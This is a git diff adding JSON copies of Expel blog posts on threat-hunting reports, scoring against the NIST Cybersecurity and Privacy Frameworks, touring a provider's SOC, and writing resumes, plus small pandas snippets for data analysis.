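# pairings so you have the context needed to judge legitimate vs. suspicious.
rare = counts.head(25)[["parent_name", "process_name"]]
df.merge(rare, on=["parent_name", "process_name"]).to_csv("pairs_to_review.csv", index=False)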
If you use Python like a normal person (Just kidding, Ruby fans!), then try implementing some interesting data analysis and manipulation with the Pandas library . If you aren\u2019t familiar with pandas , it is an open source library that provides data structures and data analysis tools for Python. Step 5: Share your analysis and findings a.k.a. How to justify the time (and money) spent on hunting Congratulations \u2014 you\u2019ve completed your hunt! Once you\u2019re done, now it\u2019s time to tell your team what you found and how you propose fixing the problems (if there are any). Organizations report their hunting results in lots of different ways \u2014 a Word document, PowerPoint slide(s), interpretive dance (Why not?) or a web reporting tool like Sharepoint, Confluence or Microsoft Teams. At Expel, we share our hunt findings with our customers right in Expel Workbench . No matter how you choose to present the findings of your hunt, your hunt report should \u2014 at a minimum \u2014 contain the following information: Description of the hunt technique What data was collected What was reviewed What was investigated Findings grouped by: Malicious Suspicious Notable (Or however you want to categorize your findings based on your perceived threat level) Make hunting part of your regular security responsibilities While hunting for anomalous process relationships can help you uncover malicious activity, I have to tell you that it doesn\u2019t always reveal APTz. Hunting may not even reveal malware. But here\u2019s the thing: If your organization is well protected and employees aren\u2019t breaking protocols, then your hunting results shouldn\u2019t be all that riveting. And that\u2019s good. But on the other hand, if your web server is ever compromised and an attacker runs a webshell to execute a command shell, you\u2019ll find it with this \u201canomalous process pairings\u201d hunt technique. Sure, every organization hopes that they\u2019ll never fall victim to an attack, but we all know that it\u2019ll happen eventually. Want to learn more about threat hunting? Then check out this post and then this post . Interested in hearing more about how we hunt here at Expel? Drop us a note ." +} \ No newline at end of file diff --git a/how-to-get-started-with-the-nist-cybersecurity-framework.json b/how-to-get-started-with-the-nist-cybersecurity-framework.json new file mode 100644 index 0000000000000000000000000000000000000000..b687469fc7d7287a28856a394e759468c1575530 --- /dev/null +++ b/how-to-get-started-with-the-nist-cybersecurity-framework.json @@ -0,0 +1,6 @@ +{ + "title": "How to get started with the NIST Cybersecurity Framework ...", + "url": "https://expel.com/blog/how-to-get-started-with-the-nist-cybersecurity-framework-csf/", + "date": "Mar 19, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG How to get started with the NIST Cybersecurity Framework (CSF) Security operations \u00b7 8 MIN READ \u00b7 BRUCE POTTER \u00b7 MAR 19, 2018 \u00b7 TAGS: Example / How to / Mission / NIST / Planning Alright, let\u2019s address the elephant in the room. Frameworks aren\u2019t known for being page turners \u2014 even when they\u2019re shortened into seven characters like the NIST CSF. But there are some things you do because they\u2019re \u201cgood\u201d for you \u2014 like going to the doctor, eating well and exercising. The NIST CSF is like that. 
While we can\u2019t turn the NIST CSF into the latest best seller (sorry!), we can give you a quick tour and show you exactly how Expel can positively affect your NIST CSF ratings \u2014 both now \u2026 and over the long term. Introduction Newsflash! The NIST Cybersecurity Framework was never intended to be something you could \u201cdo.\u201d It\u2019s supposed to be something you can \u201cuse.\u201d But that\u2019s often easier said than done. The CSF can be a confusing and intimidating process to go through. So, if you\u2019re at a loss about how to implement it, you\u2019re not alone. But rest assured, since the CSF was released back in 2013, lots of organizations have done it, including Expel. Like others, we\u2019ve found it to be a useful tool to help us understand where we are and where we\u2019re going as we grow our broader cyber risk management program. Here at Expel, we are our own customer. That means we use our own service as part of our internal IT security efforts. I\u2019ve honestly been shocked at the impact using the Expel service had on our CSF scores and wanted to share what I\u2019ve learned about how Expel can help you on the road to CSF nirvana. Watch the video overview \u2026 or keep scrolling to read on A three-minute tour of the NIST CSF Let\u2019s start with a \u201cCliffsNotes\u201d overview. Like an apple, at the core of the CSF is, unsurprisingly, the Core. The Core is meant to capture the entirety of cybersecurity. Yup, pick anything related to cybersecurity and it should be in the Core. If you\u2019re thinking \u201cthat sounds ambitious\u201d you\u2019re right. To capture everything, the Core is broken down into buckets (and even more buckets inside those buckets). Or, if you\u2019re more outdoorsy, you can think of the Core as a big tree with big branches (aka functional areas), which have smaller branches (aka categories), which have leaves on them (aka sub-categories). Whatever metaphor you choose, the subcategories have the specific types of things you should probably be doing. The Core has functional areas: identify, protect, detect, respond, and recover. These are basically the lifecycle of cybersecurity without actually being a loop. Under each functional area, there are categories. For instance, under Identify, there\u2019s asset management, business environment, governance, risk assessment, and risk management area. Under each category, there are (unsurprisingly) subcategories. For instance, under asset management, there are six sub-categories including things like \u201cPhysical devices and systems within the organization are inventoried\u201d and \u201cSoftware platforms and applications within the organization are inventoried.\u201d The Core is nothing if not comprehensive. It\u2019s a big tree, but it\u2019s a tree that can really help you mature your cyber risk management posture \u2026 which is pretty unique for a tree. Find your baseline (in two hours or less) Whew! Now that we\u2019ve got that out of the way, what can you do with the Core? At Expel, we\u2019ve found the CSF Core can be super helpful to describe where we are and where we want to be with respect to cyber risk management. The first step is getting a baseline of where we\u2019re at today. Here\u2019s how we suggest figuring out the \u201cas is\u201d state for your organization. Start by looking at the sub-categories. You\u2019ll see lots of very specific things that you should be doing. 
For example, under Anomalies and Events (AE) in the Detect (DE) functional area, there are five subcategories: DE.AE-1: A baseline of network operations and expected data flows for users and systems is established and managed DE.AE-2: Detected events are analyzed to understand attack targets and methods DE.AE-3: Event data are aggregated and correlated from multiple sources and sensors DE.AE-4: Impact of events is determined DE.AE-5: Incident alert thresholds are established You\u2019ll probably look at these subcategories and think \u201cyeah, I\u2019m kinda doing those things,\u201d which is good. But how well are you doing them? At Expel we use a six-point scale to rate ourselves on each subcategory (we\u2019re computer scientists, so our scale starts at 0). Here\u2019s what the scale looks like: By applying this scale to the (gulp!) 98 subcategories you\u2019ll get a good measure of where your organization stands. Just don\u2019t forget that there are 98 sub-categories. So, don\u2019t overthink it. You don\u2019t need to spend a bunch of time debating the finer points of each score. For instance, resist the urge to add significant digits to the scale. Try to stick with integer ratings. If you must, allow yourself .5 increments (for example, you can score a 2, 2.5, 3, 3.5, etc.). If you\u2019re incrementing by tenths you\u2019re in the danger zone \u2026 and under no circumstance should you go to the hundredths place. Not ever. That\u2019s far too much specificity for what\u2019s meant to be a quick assessment of where you stand. At a leisurely pace of two sub-categories per minute, you\u2019ll be done in an hour and even have time for a break. Once you\u2019re done with the self assessment, take that break and then do it again. But this time, instead of documenting where you are, document where you want to be. When building your \u201cto-be,\u201d be aware that (with the rare exception) you don\u2019t need to be a five. Being \u201cworld class\u201d in anything takes a lot of effort and resources. Organizations that require world class security controls generally know it and are prepared to shell out megabucks (or megaBitcoin) to achieve it. In most cases you should probably be shooting for a four \u2014 sometimes a bit higher, sometimes a bit lower. Charting your course \u2026 literally OK. So now you\u2019ve got a lot of data and you\u2019re thinking \u201chow the heck do I analyze and interpret all of this data\u201d and \u201chow are my execs (who only understand simple shapes and primary colors) going to understand this?\u201d You\u2019re in luck. With this blog post, we\u2019re releasing the Expel self-scoring tool for NIST CSF . It\u2019s an Excel spreadsheet that\u2019ll track all of your info and (bonus!) it\u2019ll autogenerate fancy shmancy radar charts for you. The spreadsheet rolls up all of your scores for each subcategory into an average for the category that you can use to see exactly where you stand and where you want to be. You can see an example of the type of graph the spreadsheet can create: NIST Cybersecurity Framework Analysis: Current State vs. Goal These graphs do a good job of highlighting the areas where you\u2019re doing really well (in this case, Identify: Governance) and areas where you need to focus your efforts (Detect, Respond and Recover). Every organization is different, so don\u2019t let the gaps freak you out. Remember that the CSF is an attempt to cover everything in cyber risk management.
So even in large, mature organizations there are going to be areas that haven\u2019t been a priority and large gaps between where you\u2019re at and where you want to be. Now what? Well, it\u2019s time to prioritize and plan. Unfortunately, we don\u2019t have a spreadsheet to autogenerate that. Based on your business needs and the types of risks you\u2019re most concerned about, you\u2019ll need to figure out what gaps you want to work on and how you\u2019re going to close them. It\u2019s important to set expectations (with yourself and up the chain). Closing gaps isn\u2019t a short-term program. What usually emerges is a strategic plan with lots of little pieces that fall into place along the way. Using Expel to color in your CSF As I mentioned before, we\u2019ve gone through the exercise I outlined above here at Expel. And we also use Expel to protect Expel. As a result, we\u2019ve got an idea of how Expel can impact CSF scores. To understand the answer, first you need to understand a bit of what Expel does . In short, our transparent managed security service monitors your network 24\u00d77, investigates bad activity and helps you get the answers you need so you can respond to attackers and keep them out. We do that by using your existing security technologies and ingesting the alerts they create into our Workbench to keep tabs on what\u2019s happening in your network. No new endpoints to deploy, no complex integration. Expel\u2019s first-year impact For this example, let\u2019s assume you\u2019ve got a reasonable set of existing security controls: you have antivirus on the desktop, a next-gen firewall of some sort and maybe even some other intrusion detection product. But you don\u2019t have anyone whose job it is to look at those systems. You\u2019re hoping they\u2019re defending your network and that they\u2019ll sound a siren or blast a red light when something is wrong. In that case, your CSF graph may look a lot like the one above. Now, let\u2019s say you decide you want to move to Expel and want to know what your scores would look like. Take a look: Sample NIST CSF Analysis: Current State vs. With Expel Quite the change. Now, let\u2019s look at each functional area. Detect Since Expel is a 24\u00d77 service that detects bad and anomalous activities on your network, it lifts all of the Detect scores across the board. Our detection and correlation capabilities, which our analysts and engineers are constantly refining, detect threats in your enterprise and present them to our analysts in a structured and consistent way, 24-hours a day, seven days a week. So, it kinda makes sense that outsourcing your security operations leads to better scores in the Detect function. Respond In the Respond functional area, Expel also has a dramatic impact on each category. Our remediation actions are the reason we can move the needle so much. When we detect a potentially bad activity, we kick off an investigation. Our analysts look at the alerts, gather related data and if we find there\u2019s something legit bad going on, we declare it a security incident. But we don\u2019t stop there. We also give you remediation actions for each incident. These actions are concrete steps that you can take to address the threat, accompanied by our analysis and other supporting material. This process adds consistency and technical completeness to your incident response, so you can quickly address the attack and get back to running your business. 
Our remediation actions allow you to stand on the shoulders of our world-class platform and analysts, so you get a world class response capability. It\u2019s a huge lift in an area where many organizations struggle to even get to a \u201cthree\u201d despite years of trying. Recover Expel impacts the Recover functional area a bit less than Detect and Respond. Recover is focused on longer-term incident response issues like corporate lessons learned, updating plans, and reputation management. That said, Expel still impacts your Recover score since you\u2019re more informed about the incidents you\u2019ve experienced and the remediation steps you\u2019ve taken. The net result is that your Recover activities are better informed and more mature. Expel down the road Now, fast forward 12 months and let\u2019s look at what things look like after you\u2019ve been an Expel customer for a year. Unsurprisingly, you\u2019ll continue to make incremental improvements to Detect, Respond and Recover as you continue to refine those functional areas. But now there are also big jumps in Identify and Protect because over time Expel provides more and more impact in the early lifecycle functional areas. Sample NIST CSF Analysis: Expel on day 1 vs. Expel on day 365 As we get to know you as a customer, we learn more about your systems and networks \u2014 including what\u2019s normal and what\u2019s not. Over time, we\u2019ll uncover actions we think you should take to make your enterprise more resilient to attack. These resilience actions might be configuration changes on your firewall or data protection systems, user training to help with phishing or removal of accounts with shared roles so you can audit more easily. Our analysts know a lot about security, and we feel you should be able to learn from their expertise. We\u2019ll send you resilience actions whenever we uncover these deeper concerns. Sometimes these \u201cahha\u201d moments will come in the middle of an incident. Other times, we might be out getting a cup of coffee when inspiration strikes. Whenever we have an idea that\u2019ll help make your organization more secure, we\u2019ll pass that along. Really? I know it sounds too good to be true. And I confess I\u2019m a skeptical curmudgeon so even I was surprised. But \u2026 yes \u2026 really, Expel can help you rapidly close the gaps between where you are and where you want to be from a security risk management perspective. Heck, that\u2019s why I work at Expel. I feel strongly about helping businesses of all sizes to be more secure \u2014 not just big companies with huge security and risk programs. I think Expel is unique in this regard and can provide a nearly instantaneous lift for your security posture for relatively little expense and time. Bonus: If you\u2019re an Expel customer, we\u2019ve got an interactive version of the NIST CSF self-scoring tool built right into Expel Workbench for you. Just log in and start scoring!" 
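One more note for the spreadsheet-averse: the roll-up behind those radar charts is simple enough to script yourself. Here's a minimal sketch in Python with pandas; the CSV layout (one row per subcategory with a current and a goal score) is an assumption for illustration, not the layout of the Expel tool.

import pandas as pd

# One row per subcategory ID such as "DE.AE-1", scored 0-5.
scores = pd.read_csv("csf_scores.csv")  # assumed columns: subcategory, current, goal
scores["function"] = scores["subcategory"].str.split(".").str[0]   # e.g. "DE"
scores["category"] = scores["subcategory"].str.split("-").str[0]   # e.g. "DE.AE"

# Average the subcategory scores per category: the numbers behind the radar chart.
rollup = scores.groupby(["function", "category"])[["current", "goal"]].mean().round(1)

# Largest gaps between where you are and where you want to be, biggest first.
rollup["gap"] = rollup["goal"] - rollup["current"]
print(rollup.sort_values("gap", ascending=False))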
+} \ No newline at end of file diff --git a/how-to-get-started-with-the-nist-privacy-framework.json b/how-to-get-started-with-the-nist-privacy-framework.json new file mode 100644 index 0000000000000000000000000000000000000000..c02502df252be3f1b25ce22c43c6359fe5e303d3 --- /dev/null +++ b/how-to-get-started-with-the-nist-privacy-framework.json @@ -0,0 +1,6 @@ +{ + "title": "How to get started with the NIST Privacy Framework", + "url": "https://expel.com/blog/how-to-get-started-with-nist-privacy-framework/", + "date": "Jan 28, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG How to get started with the NIST Privacy Framework Security operations \u00b7 3 MIN READ \u00b7 BRUCE POTTER \u00b7 JAN 28, 2020 \u00b7 TAGS: CISO / Framework / How to / NIST / Planning The final version of the NIST Privacy Framework is out. Privacy wonks, rejoice! The TL;DR? This new effort from NIST is a comprehensive framework that anyone can use to build a true privacy risk program, not just a compliance program. This means you can use the Privacy Framework to take a holistic approach to privacy instead of playing whack-a-mole with various controls in different regimes. It\u2019s a big deal because the Privacy Framework represents the democratization of privacy in the same way that the NIST Cyber Security Framework (CSF) brought security risk management to the masses. It demystifies a complex subject and allows smaller, less technical organizations to transact on privacy in a meaningful way. If you didn\u2019t catch my previous post about the NIST Privacy Framework, you might want to peek at that too \u2014 here it is . W00h00 (AKA why this framework matters) I am legitimately excited about the Privacy Framework for a couple of reasons. 1. It\u2019s great to have a regulatory agnostic framework to help drive privacy risk programs. The NIST CSF has been an incredibly useful framework to help people assess where they are and where they want to be from a cyber security standpoint. We use it here at Expel to measure our own progress, and we even have a tool you can use to assess your own org. Lots of our customers use it too, and they\u2019ve told us that the tool is easy to use and effective. The Privacy Framework promises to have the same type of utility but in the privacy domain. 2. Today, we\u2019re at a very different point on the maturity curve when it comes to privacy versus cyber security. I served as a facilitator for NIST during the creation of the CSF and the sessions I was involved with were filled with people who had ideas based on frameworks they\u2019d created or used, their existing cyber security program and years of cyber experience. I also had the privilege of facilitating sessions at one of the NIST Privacy Framework workshops earlier this year \u2026 but the experience was much different. While there were definitely practitioners in the room who had ideas to share from their existing programs, there were many more who were just starting their privacy risk journey and were looking for guidance on how to proceed. I think that\u2019s a general reflection of the industry right now: everyone knows they need to care about privacy but they\u2019re not sure how to care and what kind of guardrails or assessments they should put in place. 3. Finally, the Privacy Framework is very similar in structure to the CSF.
So if you\u2019ve used the CSF in any way \u2014 whether you\u2019ve used our Expel NIST CSF self-scoring tool or something else \u2014 the PF will look familiar. Any muscle memory you\u2019ve built up using the CSF will come in handy as you start to use the PF. And the directions for using this new scoring tool are pretty similar. Introducing the Expel Privacy Self-Scoring Tool Here\u2019s a sneak peek at our brand new privacy self-scoring tool , which is based on the new NIST Privacy Framework. We\u2019ve modeled it after our existing NIST CSF self-scoring tool. Given the similarity between the CSF and the PF, if you\u2019ve used our CSF tool, this one will feel very familiar. If you\u2019re wanting to address privacy risk in your own org but aren\u2019t sure where to start, then this tool is for you. It\u2019ll help you assess where you are today from a privacy standpoint and where you want to be. Here\u2019s how it works: Open the self-scoring tool and score yourself for each subcategory on a scale from 0 to 5, using integers only. Score your org according to the following scale: Don\u2019t overthink it. Download it when you have a chance and take a few hours to fill it out. It should take two to four hours the first time you go through it. We want your feedback We\u2019re working on more content that\u2019ll help you use the Privacy Framework, but for now we wanted to get the tool out for you to start using now that NIST\u2019s newest framework is finalized. If you download it and give it a try, please send us your thoughts so that we can improve the tool for the community." +} \ No newline at end of file diff --git a/how-to-get-the-most-out-of-your-upcoming-soc-tour.json b/how-to-get-the-most-out-of-your-upcoming-soc-tour.json new file mode 100644 index 0000000000000000000000000000000000000000..be853c7bfc9a5adfc5c545119059b95111e523b2 --- /dev/null +++ b/how-to-get-the-most-out-of-your-upcoming-soc-tour.json @@ -0,0 +1,6 @@ +{ + "title": "How To Get The Most Out Of Your Upcoming SOC Tour", + "url": "https://expel.com/blog/get-most-out-of-upcoming-soc-tour/", + "date": "Nov 14, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG How to get the most out of your upcoming SOC tour: making your provider uncomfortable Tips \u00b7 6 MIN READ \u00b7 MASE ISSA \u00b7 NOV 14, 2018 \u00b7 TAGS: How to / Managed security / Planning / Selecting tech / SOC Yes, you read that right. This is an article about how to make us uncomfortable. If you\u2019re in the market for an MDR or managed security services provider or looking to keep tabs on your existing provider, visiting their security operations center (SOC) can be a good way to get a sense for what you\u2019re really buying. Even the most technically advanced providers with great platforms (ahem) have people as part of their solution. The SOC floor is where the people and technology meet to provide \u2013 or fail to provide \u2013 value. Providers plan for these kinds of visits, and if you go by their default agenda you can expect to see pew-pew maps, talk with smart folks and basically get a more detailed version of the party line. We thought it would be interesting to tell you how to throw a wrench into the works \u2013 you can even use that wrench on us \u2013 with the end result of getting more useful feedback and a better perspective on what the life of a customer is really like. 
Start with their customers If you\u2019re planning a visit to a managed security provider\u2019s SOC and you haven\u2019t talked to any of their customers yet, stop planning your trip right now. The very best way to get a sense for what it\u2019s really like to be a customer is \u2026 wait for it \u2026 to talk to a customer. We\u2019ll be following up with a few pithy tidbits on conducting customer reference calls. For now, suffice it to say you\u2019ll get a higher fidelity picture of customer life by talking to customers. During a SOC visit, you\u2019ll likely be shown what the provider wants you to see by default (and yes, if you let us set the agenda we\u2019ll do the same thing). What we, at Expel, want you to see may be different than our competitors, but it will still be what we want you to see, not what you want to see. You shouldn\u2019t let us do that. Step 1: Prepare You\u2019re investing all this time, so maybe you should do a little prep. Let\u2019s skip the \u201cthink about your requirements, write them down, review them\u201d nonsense. You already know that. Here are a few things that will make your life better if you can do them ahead of time: Think about what we need to do to make you happy. No, seriously. Don\u2019t say \u201cwe want to reduce our risk.\u201d Of course you do. Be selfish. How do you want to spend your time during the day? What annoying work do you want out of your way? What thing should I, as a provider, never do, or you will curse my soul and haunt me forever? Let me say this again: be selfish. There are other things you want to get done besides the mundane day-to-day of security operations. What would make you and your team happy? Yes, you can say \u201csecurity\u201d and \u201chappy\u201d in the same sentence. I just did. QED. What do you want to pay? Know that up front. Discuss it with your provider before you commit to a visit. It\u2019s the easiest way to tell if you\u2019re wasting your time. When are you buying? This helps both of us. If a provider doesn\u2019t know when you\u2019re really going to buy, get ready to be annoyed at all the times you want to be left alone. It doesn\u2019t have to be precise, just close. \u201cProbably Q4 this year, maybe Q1 next.\u201d Perfect, I have expectations, I can modify my behavior so I don\u2019t piss you off. Who is making the decision? They should probably be at the tour. If they\u2019re not, why not? We\u2019re going to ask you if the decision maker will be in the room before we schedule the visit. \u201cYes\u201d means we\u2019re both going to get to an answer about doing business together faster. Random fact: a fast \u201cno\u201d is second in value only to a fast \u201cyes.\u201d \u201cMaybe\u201d kinda sucks, quite frankly. We\u2019ll waste less of your time with \u201cno\u201d or \u201cyes\u201d \u2026 and we both know you don\u2019t have enough time as it is. Your job is hard. Harder than ours, frankly. As for the agenda, we\u2019d suggest skipping things you can do elsewhere if you\u2019re looking to maximize your time. Do things you can only do at the vendor\u2019s facility. Craft an agenda that lets you peek in nooks and crannies. Whatever it is you want to hear about, the interesting part is who delivers the information, and how they do it. You\u2019ll definitely want to see some deliverables. These, obviously have to be scrubbed, so asking in advance is important. In addition to asking for deliverables, ask to see what it looks like when something goes wrong. Because something will go wrong. 
Anyone who says different is lying. Keep an ace up your sleeve. You\u2019ll need to ask for some things ahead of time to ensure you get them (example: getting a CISO\u2019s time is hard, as you probably know, so if you don\u2019t ask ahead of time when you\u2019re building your agenda you may not get it). But there are lots of other things that should be easy \u2026 and if they aren\u2019t, that tells you something. I\u2019ve got a specific ace to suggest to you below. Step 2: Showtime! The big day arrives and off you go. Huzzah. Whatever the agenda is \u2013 see the SOC, talk to the CISO, do a demo, talk about roadmap \u2013 pay attention to how the content is presented and who presents. That\u2019s often more telling than the content itself. The same goes for the environment it\u2019s presented in. Here\u2019re some things to watch out for: Welcome to the executive briefing center: Don\u2019t get me wrong, EBC\u2019s can be impressive facilities, and they certainly have great snacks. However, if I want to know what I\u2019m buying I want to see the halls and walls where work is done. You can get a sense for the energy of a workplace just by walking around. Do you only get to see the visitor break room, or are you pouring your coffee next to the engineers and analysts building the solutions you\u2019ll be buying? Is everyone energized, or do they look like they just filled in six additional copies of their TPS report that morning? I\u2019ll get back to you: Is a real subject matter expert talking to you about your agenda interest areas, or is it a briefer whose primary job is managing customer and sales prospect visits to the SOC? If it\u2019s an executive, is it a real decision maker or someone with an impressive title that isn\u2019t really involved in running the business? Don\u2019t get me wrong, \u201cI don\u2019t know, I\u2019ll have to get back to you\u201d is a way better answer than someone faking it when you have questions or want decisions, but keep track of the trend. It will tell you how close your presenters live to where the rubber meets the road, and therefore how good a proxy they are for the solution you\u2019re buying. Let me bring up my slides: OMFG not another PowerPoint deck! Yes, some clip art can be useful, but pay attention to whether presenters use other media to help you understand what it\u2019s like to be a customer. Whiteboards for technical discussions, conversations in front of demo screens (or cleansed live screens), energetic dialogue around a table instead of a dry presentation that\u2019s obviously canned \u2013 these indicate you may be getting a truer look into the provider\u2019s reality than if you\u2019re watching a video or a rote-memorized presentation. Does talking to any of the provider\u2019s staff feel like talking to your own team? How you feel after those dialogues tells you something. Here\u2019s our roadmap: OK, a vendor\u2019s plans for the future are well and good \u2026 and necessary. However, consider asking about what was built in the past. \u201cIn the past 12 months, what third-party integrations have you done? Which features did you release? Why?\u201d You know how you ask about work history when you\u2019re hiring someone? There\u2019s a reason for that \u2013 past behavior is a great predictor for future action. Can they answer it? Will they answer it? Again, this tells you a great deal in a very short period of time. 
Why are you here: If you get access to a few presenters you can often tell a great deal by asking a few questions of each of them. \u201cWhy do you work here?\u201d is a great one. Ask it a few times. Triangulate the truth by comparing answers from different staff. You\u2019ll get a sense for the excitement, energy and pride the provider\u2019s team has \u2026 or doesn\u2019t have. Play the ace: Time to ask for something off script. When touring the SOC ask if you can spend a bit of time with a shift analyst \u2013 someone on the pointy end of the spear whose responsibility is providing service, 24\u00d77. \u201cUm, no you can\u2019t,\u201d tells you something. If you can talk to one, have a conversation to find out what it\u2019s really like to work at the provider. Do you leave the conversation wanting to hire them? In short, get up close and make them uncomfortable Visiting your current \u2026 or would be \u2026 managed security provider can be a telling experience. It\u2019s a big time investment, but it can often be the best way to separate fact from fiction and see what you\u2019re buying first hand In addition to the mechanical requirements (See the SOC? Check. Get the security program presentation? Also check. See the roadmap? Sigh \u2026 check \u2026), think about evaluating the truth in between the lines. Make the provider uncomfortable, get close to where the action happens. The snacks won\u2019t be as good, but it will tell you way more than polished presentations in fancy conference rooms." +} \ No newline at end of file diff --git a/how-to-get-your-resume-noticed-at-expel-or-anywhere.json b/how-to-get-your-resume-noticed-at-expel-or-anywhere.json new file mode 100644 index 0000000000000000000000000000000000000000..47f1977252008de28101544da3221fe616833433 --- /dev/null +++ b/how-to-get-your-resume-noticed-at-expel-or-anywhere.json @@ -0,0 +1,6 @@ +{ + "title": "How to get your resume noticed at Expel (or anywhere)", + "url": "https://expel.com/blog/how-to-get-resume-noticed-at-expel-or-anywhere/", + "date": "May 14, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG How to get your resume noticed at Expel (or anywhere) Talent \u00b7 5 MIN READ \u00b7 AMY ROSSI, YANEK KORFF AND KAREEMA PRICE \u00b7 MAY 14, 2019 \u00b7 TAGS: Career / Employee retention / Great place to work / Hiring Foreword by Yanek Korff. There are few things more pompous than having a blog post with a foreword. Except maybe including a buzzword-filled litany of superlatives that comprise an \u201cobjective statement\u201d at the start of your resume. Or adding pages upon pages of details to your resume in an effort to say, \u201cI worked hard on this!\u201d Friend, I say these things not just to gripe, but to wave a big caution flag before you submit a resume to us (and frankly, probably to a lot of companies). This isn\u2019t a post about what not to do. Instead, we want to help you get noticed. And we\u2019d love to help you put your best foot forward so we can be part of your career journey. Amy and Kareema from our Employee Experience team share suggestions from their experiences below. Considering they represent your first audience here at Expel \u2014 the hiring manager will be your second \u2014 it\u2019s worth considering what they have to say. Some of the advice is high level and requires some quiet reflection on your part. Take the time to do just that. 
It\u2019ll make the tactics they spell out a lot easier to execute and you\u2019ll end up with a much better resume and overall application (cover letter, anyone?) than the average bear. How to un-suck your resume 1. Know where you\u2019ve been, where you\u2019re at and have thoughts about your future Think about the last time you sat down and made edits to your resume. You probably went right to the bulleted list of your accomplishments to confirm accuracy and then added some more. If this sounds like you, don\u2019t worry \u2026 you\u2019re in good company. Most people approach their resume as an artifact that documents work history in a very tactical and chronological way. At \u201cthat\u201d company, my title was \u201cthis\u201d and I did \u201cthat.\u201d While \u201cthis\u201d and \u201cthat\u201d are important parts of your work history, so are the \u201cwhat\u201d and \u201cwhy.\u201d Reflect on the career moves and decisions you\u2019ve made. Why did you choose that specific job during college? What did you learn from your worst job? How did you know it was time to look for a new role? Taking time to reflect on questions like these will help you think through your past, understand more about the present and determine what you want out of a job in the future. And it\u2019ll make your resume and cover letter (if you choose to include one) immensely better. 2. You do you One of the things you\u2019ll notice as you look over our website is we\u2019re pretty anti-buzzword. Are you a self-starter? Do you thrive in a fast-paced environment and help drive innovation? Bleh. Instead, think about what these overused expressions mean and if there\u2019s a better way to describe some of that in a more clear and authentic way. Wondering where to start? Ask others to describe working with you. They\u2019ll probably offer phrases that are real and true to you. For example, Amy once had to pick an animal that best described her (this was likely part of the intro in some training program). When she was having trouble coming up with a quick answer, she asked someone who worked with her for six years and the person replied immediately: \u201cA dolphin because they\u2019re intelligent, travel in groups, and communicate well.\u201d Getting some quick feedback from someone else can give you insight into key strengths to highlight when you write about what you can bring to a job. 3. Content is (still) king, of course Nobody wants to see a resume that looks like a collection of generic job descriptions. (There\u2019s Google for that.) Instead, share specific things you\u2019ve accomplished and make all those descriptions easily scannable. A couple pro tips for ya: Keep it brief. If you can say what you need to in a page, great. If you need two, sigh , fine. But three? Don\u2019t go there because no one reads that far. Highlight what makes you awesome. What are you proud of? This could be things like industry certifications you\u2019ve earned, years of experience directly related to the type of position you\u2019re applying for at Expel, why you traveled the world or your ability to speak several languages. List these in a \u201cSummary of Qualifications\u201d at the top of your resume. Use numbers whenever possible. Here\u2019s a good formula to use: \u201cAccomplished [feat] by [activity] proven by [metric].\u201d Put your LinkedIn profile on your resume. We like to check out your profile there too. Strike your references from your resume. We don\u2019t need them this early in the process. 
Watch for spelling, grammatical and formatting errors. Review it not one, not two but three times. And ask a friend to review it. Keep in mind that many people are applying for the same job, and having a resume full of spelling errors is a sure way to get disqualified early in the process. 4. To cover letter or not to cover letter, that is the question Cover letters aren\u2019t necessary for us, but there may be a good reason to write one. For example, if you\u2019ve worked a few jobs here and there with less than a one-year duration, use your cover letter to explain why. Erratic job history is often a red flag for an employer \u2014 and we\u2019re cautious about this too. But we also get there may be some legit reasons for the choices you made and we\u2019re open to understanding them. If you write a cover letter, then write one that\u2019s only for Expel. The standard cover letters that people use when applying to multiple jobs all sound generic. And we want to get to know you . Help us connect the dots between the experience and skills laid out in your resume, and explain to us why you\u2019d be a perfect fit for this job. 5. Get to know us Take time to learn about and connect with Expel. The more you know about us, the easier it\u2019ll be to figure out whether this is the kind of place you want to work, and we\u2019ll have greater confidence that you\u2019re really interested. Connect with us on LinkedIn or follow us on Twitter. Applied online already? Great! Take the extra step and reach out to the recruiter through LinkedIn \u2014 let her know you applied and why you\u2019re interested. When you see something we\u2019ve shared on Twitter that you find interesting, like, comment on it and share it. We\u2019ll notice. 6. Apply for one job only Nothing says \u201cI don\u2019t care, I just want any old job\u201d like applying to multiple jobs at the same company. There are some exceptions to this rule, especially when two jobs are very similar. And if you don\u2019t see a job opening that fits your skills and experience, send an email to careers@expel.io explaining why we should connect now. 7. Go for it Don\u2019t feel like you meet every single qualification? Apply anyway. There\u2019s specific research that shows women often hold back from applying to jobs when they feel like they don\u2019t meet all the criteria. Sometimes this is about confidence, but other research suggests it\u2019s about a misunderstanding of how the hiring process actually works. If for whatever reason you\u2019re hesitating, just go for it. Specific skills and knowledge are important but no more so than the ability to learn and grow. We love finding someone who\u2019s worked in a different industry but can apply their skills to the work we do. This brings new perspectives and experiences to our company, and we value that. Wanna work here? You know what to do. Yes, this post had a foreword, but it\u2019s long enough so we skipped the witty conclusion. (You\u2019re welcome!) Send us a note if we missed any resume \u201cmust haves\u201d or come chat with us on Twitter. Want to apply for a job at Expel? You know what to do. \u261d\ufe0f Are you seriously still reading? Wow, we dig your persistence and thirst for knowledge. If you\u2019d like to keep learning about how to build an excellent resume and, perhaps more importantly, a \u201ccareer management document,\u201d maybe check out the \u201c Your Resume Stinks! \u201d podcast over on the manager-tools website . 
And if you\u2019re still hungry after that, there\u2019s a slew of updates to listen to after that one. Good luck, and happy job hunting!" +} \ No newline at end of file diff --git a/how-to-get-your-security-tool-chest-in-order-when-you-re.json b/how-to-get-your-security-tool-chest-in-order-when-you-re.json new file mode 100644 index 0000000000000000000000000000000000000000..b0b5ceb878d6802359db646463f196873eac35bc --- /dev/null +++ b/how-to-get-your-security-tool-chest-in-order-when-you-re.json @@ -0,0 +1,6 @@ +{ + "title": "How to get your security tool chest in order when you're ...", + "url": "https://expel.com/blog/how-to-get-security-tool-chest-in-order-when-growing-like-crazy/", + "date": "Apr 30, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG How to get your security tool chest in order when you\u2019re growing like crazy Security operations \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 APR 30, 2019 \u00b7 TAGS: CISO / Managed security / Planning / Selecting tech / Tools There\u2019s a dozen new faces at the all-hands, and HR is adding boatloads of new job reqs to the company website every week. When you\u2019re part of a fast-growing org, security is often left playing catch-up. Maybe you\u2019re still building out your team, or you\u2019re trying to hire just one more full-time employee in addition to yourself to help check off all your to-dos. If this 